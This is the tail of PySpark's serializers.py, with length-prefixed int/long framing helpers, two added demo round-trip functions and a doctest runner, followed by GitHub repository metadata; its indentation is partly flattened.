return "UTF8Deserializer(%s)" % self.use_unicode
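# Illustrative sketch (not part of the original PySpark module): each string
# arrives as a 4-byte length followed by UTF-8 bytes, matching what the JVM
# side writes with String.getBytes. Uses write_int, defined just below.
# Hypothetical helper, never called at import time.
def _demo_utf8_deserializer():
    import io
    buf = io.BytesIO()
    for s in (u"spark", u"s\u00e9rialiseur"):
        data = s.encode("utf-8")
        write_int(len(data), buf)
        buf.write(data)
    buf.seek(0)
    assert list(UTF8Deserializer().load_stream(buf)) == [u"spark", u"s\u00e9rialiseur"]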
def read_long(stream):
length = stream.read(8)
if not length:
raise EOFError
return struct.unpack("!q", length)[0]
def write_long(value, stream):
stream.write(struct.pack("!q", value))
def pack_long(value):
return struct.pack("!q", value)
def read_int(stream):
length = stream.read(4)
if not length:
raise EOFError
return struct.unpack("!i", length)[0]
def write_int(value, stream):
stream.write(struct.pack("!i", value))
def write_with_length(obj, stream):
write_int(len(obj), stream)
stream.write(obj)
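# Illustrative sketch (not part of the original PySpark module): the framing
# helpers above use big-endian ("network order") struct formats, 4 bytes for
# ints ("!i") and 8 bytes for longs ("!q"). Hypothetical helper, never called
# at import time.
def _demo_framing_helpers():
    import io
    buf = io.BytesIO()
    write_int(7, buf)
    write_long(1 << 40, buf)
    buf.seek(0)
    assert read_int(buf) == 7
    assert read_long(buf) == 1 << 40
    assert pack_long(1) == b"\x00" * 7 + b"\x01"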
if __name__ == '__main__':
import doctest
(failure_count, test_count) = doctest.testmod()
if failure_count:
exit(-1)
| {
"content_hash": "8aaadd9f398c37858e442ea6f4cd2796",
"timestamp": "",
"source": "github",
"line_count": 691,
"max_line_length": 100,
"avg_line_length": 31.781476121562953,
"alnum_prop": 0.6202358726833933,
"repo_name": "ericvandenbergfb/spark",
"id": "37e7cf3fa662eb4cdca85a7130f4c1a3a4f1d5c5",
"size": "22746",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "python/pyspark/serializers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "33781"
},
{
"name": "Batchfile",
"bytes": "30285"
},
{
"name": "C",
"bytes": "1493"
},
{
"name": "CSS",
"bytes": "23957"
},
{
"name": "HTML",
"bytes": "10056"
},
{
"name": "Java",
"bytes": "3142003"
},
{
"name": "JavaScript",
"bytes": "141585"
},
{
"name": "Makefile",
"bytes": "7774"
},
{
"name": "PLpgSQL",
"bytes": "8788"
},
{
"name": "PowerShell",
"bytes": "3756"
},
{
"name": "Python",
"bytes": "2434056"
},
{
"name": "R",
"bytes": "1089584"
},
{
"name": "Roff",
"bytes": "14714"
},
{
"name": "SQLPL",
"bytes": "6233"
},
{
"name": "Scala",
"bytes": "24449859"
},
{
"name": "Shell",
"bytes": "158388"
},
{
"name": "Thrift",
"bytes": "33605"
}
],
"symlink_target": ""
} |